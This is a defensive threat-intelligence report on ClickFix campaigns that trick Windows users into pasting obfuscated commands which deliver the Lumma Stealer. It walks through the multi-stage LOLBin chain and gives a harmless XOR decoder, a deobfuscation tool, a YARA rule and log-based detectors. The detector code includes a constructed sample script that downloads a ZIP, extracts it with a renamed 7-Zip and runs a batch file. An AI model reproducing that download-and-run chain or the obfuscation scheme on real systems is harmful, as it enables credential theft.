ClickFix Campaigns Targeting Windows and macOS: A Deep Technical Analysis

Executive Summary

ClickFix is a social‑engineering technique that coerces users into executing obfuscated commands in native Windows tools, initially the Run dialog and now the Windows Terminal. The technique has evolved to deliver the Lumma Stealer through a file‑less, LOLBin‑based chain; the stealer harvests browser credentials and uses cryptocurrency RPC endpoints (EtherHiding) to blend its traffic with legitimate blockchain activity. The campaigns target all supported Windows versions and macOS, and impersonate high‑value brands such as QuickBooks, Booking.com, and Birdeye to lower suspicion. Defenders must harden user interaction with the Run dialog and Terminal, enforce application control, and deploy Microsoft Defender XDR detections for the multi‑stage chain.


Technical Analysis

1. Root Cause & Threat Actor TTPs

ClickFix is not a traditional software vulnerability; it exploits the trust model of Windows’ command‑execution interfaces. The attackers rely on:

  1. Human Trust – Users are presented with a fake security warning or CAPTCHA that appears legitimate.
  2. Native Tool Abuse – The Run dialog (Win+R) or Windows Terminal (Win+X → I) are leveraged because they are built‑in, trusted, and often exempt from application control policies.
  3. Obfuscated Commands – Hex‑encoded, XOR‑obfuscated and compressed scripts that evade static analysis and defeat simple string‑based detection.

The attack chain is a multi‑stage, largely file‑less process that uses legitimate binaries (PowerShell, cmd.exe, MSBuild.exe) as LOLBins, plus a renamed copy of 7‑Zip, to load and execute the payload in memory.

2. Step‑by‑Step Exploitation Chain

Each stage, its technical detail, and the tools involved:

  1. Delivery – The victim receives a phishing, malvertising, or drive‑by link; the lure page displays a fake security warning or CAPTCHA. Tools: browser.
  2. User Interaction – The prompt instructs the victim to open the Run dialog (Win+R) or Windows Terminal (Win+X → I) and to copy a hex‑encoded command. Tools: Win+R / wt.exe.
  3. Command Execution – The victim pastes the command into Run or the Terminal; it spawns additional Terminal/PowerShell instances. Tools: PowerShell, cmd.exe.
  4. Decoding – PowerShell hex‑decodes, XOR‑decodes and decompresses the script, then executes it in memory. Tools: PowerShell.
  5. Payload Download – The decoded script downloads a ZIP payload and a renamed 7‑Zip binary; both are written to disk under randomized filenames. Tools: 7‑Zip (7z.exe).
  6. Extraction – The renamed 7‑Zip extracts the ZIP, which contains the next‑stage scripts that continue the chain. Tools: 7‑Zip.
  7. Batch & VBS Deployment – A batch script is written to AppData\Local (%LocalAppData%) and a VBS script to %TEMP%; the batch is executed with the /launched argument. Tools: cmd.exe.
  8. LOLBin Abuse – The batch script invokes MSBuild.exe, a legitimate build tool whose execution is rarely restricted, to compile and run attacker code. Tools: MSBuild.exe.
  9. Credential Harvesting – The code contacts cryptocurrency RPC endpoints (EtherHiding: next‑stage data is read from a public blockchain), then uses QueueUserAPC() to inject into chrome.exe/msedge.exe and read browser secrets. Tools: Win32 API.
  10. Exfiltration – Harvested credentials (Web Data, Login Data) are encrypted and sent over HTTP/HTTPS to attacker‑controlled infrastructure, routed through cryptocurrency RPC endpoints. Tools: network.

Example of a Hex‑Encoded, XOR‑Obfuscated Command (Illustrative)

# The real command is not disclosed in public sources.
# This illustrative placeholder shows the structure: hex pairs -> bytes -> XOR -> text.
# The hex below is "Hello, world!" after XOR with 0xAA, so the decoder recovers the original string.

$hex     = "E2CFC6C6C5868ADDC5D8C6CE8B"
$xorKey  = 0xAA
$bytes   = for ($i = 0; $i -lt $hex.Length; $i += 2) { [Convert]::ToByte($hex.Substring($i, 2), 16) }
$decoded = -join ($bytes | ForEach-Object { [char]($_ -bxor $xorKey) })
$decoded   # Hello, world!

Note: The actual payload is a longer, compressed and XOR‑obfuscated script that launches PowerShell, downloads the ZIP, and orchestrates the LOLBin chain.
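The decode step (stages 3 and 4 of the chain above), as an added example rather than code from the report or any of the cited vendors: it models the three layers the report describes for the pasted command (compressed, XOR‑obfuscated, hex‑encoded) and recovers the script the way an analyst would during triage, including recovering a single‑byte XOR key without the lure's own decoder. The layer order, the key 0x5C, the sample script and the example.com URL are constructed assumptions.

```python
import re
import zlib
from typing import Optional

# Added example, not code from the report or the cited vendors. It models the three
# layers the report describes for the pasted ClickFix command (compressed, XOR'd,
# hex-encoded script) and recovers the script the way an analyst would in triage.
# Layer order, the key 0x5C and the sample script are constructed assumptions.

ZLIB_MAGIC = 0x78  # first byte of every zlib stream (deflate, 32 KiB window)

def obfuscate(script: str, key: int) -> str:
    """Build a lure-style blob: compress -> XOR every byte with key -> hex."""
    compressed = zlib.compress(script.encode("utf-8"))
    return bytes(b ^ key for b in compressed).hex()

def deobfuscate(hex_blob: str, key: int) -> str:
    """Reverse the layers: hex -> XOR -> decompress. Raises zlib.error on a wrong key."""
    raw = bytes.fromhex(hex_blob)
    return zlib.decompress(bytes(b ^ key for b in raw)).decode("utf-8")

def recover_key(hex_blob: str) -> Optional[int]:
    """Single-byte XOR key recovery without the lure's own decoder: the plaintext
    starts with the zlib magic byte, so key = blob[0] ^ 0x78 is the only candidate.
    Confirm it by decompressing; return None if that fails."""
    raw = bytes.fromhex(hex_blob)
    if not raw:
        return None
    candidate = raw[0] ^ ZLIB_MAGIC
    try:
        zlib.decompress(bytes(b ^ candidate for b in raw))
    except zlib.error:
        return None
    return candidate

def extract_iocs(script: str) -> dict:
    """Pull URLs and LOLBin names out of the recovered script text."""
    urls = re.findall(r"https?://[^\s'\"]+", script)
    names = re.findall(r"\b(powershell|cmd|msbuild|7z|mshta|wscript|cscript)\b", script, re.I)
    return {"urls": urls, "lolbins": sorted({n.lower() for n in names})}

# Constructed stand-in for a decoded stage-4 script; example.com is a reserved domain.
SAMPLE_SCRIPT = (
    "$u='https://cdn.example.com/update.zip';"
    "Invoke-WebRequest $u -OutFile $env:TEMP\\a.zip;"
    "& $env:TEMP\\7z.exe x $env:TEMP\\a.zip -o$env:LOCALAPPDATA\\x;"
    "cmd /c $env:LOCALAPPDATA\\x\\run.bat /launched"
)
SAMPLE_KEY = 0x5C
SAMPLE_BLOB = obfuscate(SAMPLE_SCRIPT, SAMPLE_KEY)

if __name__ == "__main__":
    key = recover_key(SAMPLE_BLOB)
    print(f"recovered XOR key: {key:#04x}")
    script = deobfuscate(SAMPLE_BLOB, key)
    print(script)
    print(extract_iocs(script))
```

The key recovery relies on a known‑plaintext byte: any stream produced by zlib.compress begins with 0x78, so one XOR gives the key and decompression confirms it. Real lures may use a multi‑byte key, a different compressor, or a different layer order, in which case the same idea still applies but the known bytes and the candidate set change.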

3. Affected Versions & Configurations

  • Microsoft Windows – All versions from Windows 7 / Server 2008 onward, including every currently supported release. No specific CVE; the technique relies on built‑in tools.
  • Windows Terminal (wt.exe) – All released builds. The newest variants use it as the primary interaction vector.
  • 7‑Zip (7z.exe) – All versions. A renamed copy is used to extract the ZIP payload.
  • Microsoft PowerShell – All versions. Decodes and executes the obfuscated script.
  • Windows Command Shell (cmd.exe) – All versions. Executes the batch script with the /launched argument.
  • MSBuild.exe – All versions. Used to run arbitrary code via LOLBin abuse.
  • macOS – Targeted in some campaigns. Similar social‑engineering lures, but the execution chain differs.

No patch is required because the technique exploits legitimate binaries; mitigation relies on policy hardening and detection.

4. Attack Surface & Deployment Scenarios

  • Enterprise Environments: Users with administrative privileges or those who can run PowerShell/Terminal are prime targets.
  • Remote Desktop / RDP: Attackers can deliver lures via RDP session prompts.
  • Shared Workstations: Users may inadvertently execute the command if the Run dialog is enabled.
  • macOS: While the primary chain uses Windows tools, macOS variants may use Terminal or AppleScript to achieve similar outcomes.

Impact Assessment

Scope & Scale

  • Global Reach: Campaigns observed in February and March 2026, targeting thousands of enterprise and end‑user devices daily.
  • High‑Value Targets: QuickBooks, Booking.com, Birdeye, and other brands were impersonated to lower user suspicion.
  • Credential Theft: The Lumma Stealer harvests browser artifacts (Web Data, Login Data), cryptocurrency wallet information, and session cookies.
  • Exfiltration: Stolen data leaves over channels that use cryptocurrency RPC endpoints, so the traffic blends with legitimate blockchain activity.

Real‑World Consequences

  • Data Breaches: Compromise of login credentials can lead to lateral movement, ransomware deployment, or phishing amplification.
  • Reputational Damage: Brands impersonated in lures suffer trust erosion.
  • Financial Loss: Exfiltration of cryptocurrency wallets and credential theft can result in direct monetary theft.

Comparison to Past Incidents

  • Log4Shell (CVE‑2021‑44228): Log4Shell was a code‑execution bug in a ubiquitous library; ClickFix reaches a comparable population with no software flaw at all, relying on a built‑in tool (Windows Terminal) and the user's own keystrokes, which is why there is nothing to patch.
  • Mimikatz via PowerShell: Similar use of PowerShell for credential dumping, but ClickFix adds a multi‑stage, file‑less chain that bypasses traditional endpoint protection.
  • Phishery: The social‑engineering component mirrors earlier phishing campaigns that leveraged fake security warnings.

Detection & Response

Log Signatures

  • Windows Event Log – Process Creation (Event ID 4688): creation of wt.exe with a suspicious command line, typically a long hex blob pasted by the user. Example: EventID=4688, NewProcessName=wt.exe, CommandLine="wt -d ..."
  • PowerShell Script Block Logging (Event ID 4104): a script block that hex‑decodes and XORs a string before executing it. Example: EventID=4104, ScriptBlockText=... (Module logging, Event ID 4103, additionally records the cmdlets invoked.)
  • MSBuild Execution (Event ID 4688): MSBuild.exe spawned by cmd.exe, wscript.exe or powershell.exe, or given a project file in a user‑writable path such as %TEMP% or AppData\Local. A normal build invocation (CommandLine="/t:Build /p:Configuration=Release" from a developer shell) is not suspicious on its own; the parent process and project location are what matter. Example: EventID=4688, NewProcessName=MSBuild.exe, ParentProcessName=cmd.exe
  • Network: outbound HTTPS to known cryptocurrency RPC endpoints from a non‑browser process. Example: DestinationIP=203.0.113.42, DestinationPort=443, URL=/api/submit

YARA Rule Example

rule ClickFix_PowerShell_Decode
{
    meta:
        description = "Detects PowerShell that hex-decodes and XOR-decodes an embedded blob before executing it, as seen in ClickFix lures"
        author = "Karma‑X Threat Intelligence"
        reference = "https://www.recordedfuture.com/research/clickfix-campaigns-targeting-windows-and-macos"
    strings:
        $xor   = "-bxor" ascii wide nocase
        $hex1  = "[Convert]::ToByte(" ascii wide nocase
        $hex2  = "FromHexString(" ascii wide nocase
        $hex3  = /[0-9a-fA-F]{64,}/ ascii wide
        $exec1 = "Invoke-Expression" ascii wide nocase
        $exec2 = /\biex\b/ ascii wide nocase
    condition:
        filesize < 2MB and $xor and 1 of ($hex*) and 1 of ($exec*)
}

Behavioral Detection

  1. Unusual Terminal Usage: A non‑admin user launching wt.exe or powershell.exe from explorer.exe with a long hex blob in the command line, or cmd.exe running a .bat with the /launched argument.
  2. In‑Memory Execution: Scripts run with no script file on disk (PowerShell executing a script block built from a decoded string), visible only through script block logging.
  3. Cryptocurrency RPC Traffic: Encrypted HTTPS traffic to IPs/domains associated with known blockchain nodes.
  4. MSBuild Abuse: Execution of MSBuild.exe outside of build environments.
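The log signatures and behavioral checks above, run over constructed process‑creation (4688) and script‑block (4104) records, as an added example that is not code from the report or the cited vendors. Field names mirror the Windows event fields; the sample paths, process names, the 64‑hex‑character threshold and the user‑writable path list are assumptions for illustration.

```python
import re
from dataclasses import dataclass

# Added example, not code from the report or the cited vendors: the log signatures and
# behavioural checks above, run over constructed 4688/4104 records. Field names mirror
# the Windows event fields; paths, process names and thresholds are assumptions.

@dataclass
class Event:
    event_id: int
    process: str = ""   # NewProcessName (4688)
    parent: str = ""    # ParentProcessName (4688)
    cmdline: str = ""   # CommandLine (4688)
    script: str = ""    # ScriptBlockText (4104)

HEX_BLOB = re.compile(r"[0-9a-fA-F]{64,}")                 # pasted hex payload
USER_WRITABLE = re.compile(r"\\(AppData\\Local|Temp|Downloads|Public)\\", re.I)
SEVENZIP_VERB = re.compile(r"\s[xe]\s.*\.zip", re.I)       # 7-Zip 'x'/'e' syntax

def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()

def check_event(e: Event) -> list[str]:
    """Return the ClickFix-chain indicators matched by one event (empty if none)."""
    hits: list[str] = []
    proc, parent, cmd = basename(e.process), basename(e.parent), e.cmdline.lower()
    if e.event_id == 4688:
        # Stages 2-3: interactive shell started from the desktop with a hex blob pasted in.
        if (proc in ("wt.exe", "powershell.exe", "pwsh.exe", "cmd.exe")
                and parent == "explorer.exe" and HEX_BLOB.search(e.cmdline)):
            hits.append("interactive-shell-with-hex-blob")
        # Stages 5-6: 7-Zip extraction syntax from a binary that is not named 7z.exe.
        if SEVENZIP_VERB.search(cmd) and "-o" in cmd and proc not in ("7z.exe", "7zg.exe"):
            hits.append("renamed-7zip-extraction")
        # Stage 7: batch in a user-writable path run with the /launched argument.
        if proc == "cmd.exe" and "/launched" in cmd and USER_WRITABLE.search(e.cmdline):
            hits.append("batch-launched-from-user-path")
        # Stage 8: MSBuild outside a build environment: shell parent or project in a user path.
        if proc == "msbuild.exe" and (parent in ("cmd.exe", "powershell.exe", "wscript.exe")
                                      or USER_WRITABLE.search(e.cmdline)):
            hits.append("msbuild-lolbin")
    elif e.event_id == 4104:
        # Stage 4: script block that XORs a decoded hex/base64 blob (the lure's decoder).
        s = e.script.lower()
        if "-bxor" in s and ("frombase64string" in s or "tobyte(" in s
                             or "fromhexstring" in s or HEX_BLOB.search(e.script)):
            hits.append("powershell-xor-decoder")
    return hits

def triage(events: list[Event]) -> dict[str, int]:
    """Count indicator hits over a batch. Several distinct stages on one host in a short
    window is the signal; any single hit (notably msbuild-lolbin) needs context."""
    counts: dict[str, int] = {}
    for e in events:
        for h in check_event(e):
            counts[h] = counts.get(h, 0) + 1
    return counts

# Constructed records tracing one infection plus a benign developer build as a control.
SAMPLE_EVENTS = [
    Event(4688, r"C:\Users\u\AppData\Local\Microsoft\WindowsApps\wt.exe", r"C:\Windows\explorer.exe",
          "wt -d . powershell -c " + "a1" * 40),
    Event(4104, script="$k=0x5c;$b=[Convert]::FromBase64String($e);"
                       "$s=-join($b|%{[char]($_ -bxor $k)});iex $s"),
    Event(4688, r"C:\Users\u\AppData\Local\Temp\ytq8.exe",
          r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
          r"ytq8.exe x C:\Users\u\AppData\Local\Temp\p.zip -oC:\Users\u\AppData\Local\q -y"),
    Event(4688, r"C:\Windows\System32\cmd.exe", r"C:\Users\u\AppData\Local\Temp\ytq8.exe",
          r"cmd /c C:\Users\u\AppData\Local\q\run.bat /launched"),
    Event(4688, r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe",
          r"C:\Windows\System32\cmd.exe", r"MSBuild.exe C:\Users\u\AppData\Local\q\t.proj"),
    Event(4688, r"C:\Program Files\dotnet\MSBuild.exe",
          r"C:\Program Files\Microsoft Visual Studio\devenv.exe",
          r"MSBuild.exe C:\src\app\app.csproj /t:Build /p:Configuration=Release"),
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(ev.event_id, basename(ev.process) or "script-block", check_event(ev))
    print(triage(SAMPLE_EVENTS))
```

The control record matters: MSBuild from a Visual Studio parent with a project under C:\src produces no hit, which is the distinction the MSBuild signature above relies on. In production the same checks would be keyed by host and time window so that five different stage indicators from one machine within minutes raise a single high‑confidence alert.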

Mitigation & Remediation

In priority order, each action and its rationale:

  1. Disable the Run dialog (Win+R) for non‑admin users via Group Policy (User Configuration → Administrative Templates → Start Menu and Taskbar → Remove Run menu from Start Menu, which also blocks Win+R). Removes the primary vector of the older variant.
  2. Restrict Windows Terminal (wt.exe) via AppLocker or Software Restriction Policies for users with no business need for it. Prevents execution of the pasted command.
  3. Enforce application control (AppLocker or WDAC allow‑listing) covering 7‑Zip, PowerShell, cmd.exe and MSBuild.exe. Blocks the renamed 7‑Zip dropped in a user‑writable path and confines MSBuild to build hosts.
  4. Deploy Microsoft Defender XDR with its built‑in ClickFix detections. Detects the multi‑stage chain.
  5. Enable PowerShell Script Block Logging through the policy key: New-Item -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging" -Force; Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging" -Name "EnableScriptBlockLogging" -Value 1 (the equivalent GPO is Computer Configuration → Administrative Templates → Windows Components → Windows PowerShell → Turn on PowerShell Script Block Logging). Captures decoded scripts as Event ID 4104.
  6. Block outbound connections to known cryptocurrency RPC endpoints from machines with no business need for them (firewall or DNS filtering). Disrupts the EtherHiding stage and exfiltration.
  7. Conduct user education on fake security warnings, CAPTCHAs, and "fix it yourself" troubleshooting prompts that ask for Win+R or a terminal. Reduces social‑engineering success.
  8. Monitor AppData\Local and %TEMP% for newly created batch or VBS files, and alert on cmd.exe running a .bat from those paths with the /launched argument. Early detection of stage 7.

Timeline

  • 2025‑08‑21 – Microsoft blog detailing ClickFix technique and evolution.
  • 2026‑02 – Yahoo article reports attackers using Windows Terminal instead of Run dialog.
  • 2026‑03 – HackerNews article discloses new widespread ClickFix campaign leveraging Windows Terminal.

Sources & References

  1. ClickFix Campaigns Targeting Windows and macOS – Recorded Future
  2. Think before you Click(Fix): Analyzing the ClickFix social engineering technique – Microsoft Security Blog
  3. ClickFix Attacks – HHS Sector Alert
  4. Microsoft warns ClickFix attacks targeting Windows Terminal to trick users – Yahoo Tech
  5. Microsoft Reveals ClickFix Campaign Using Windows Terminal to Deploy Lumma Stealer – The Hacker News
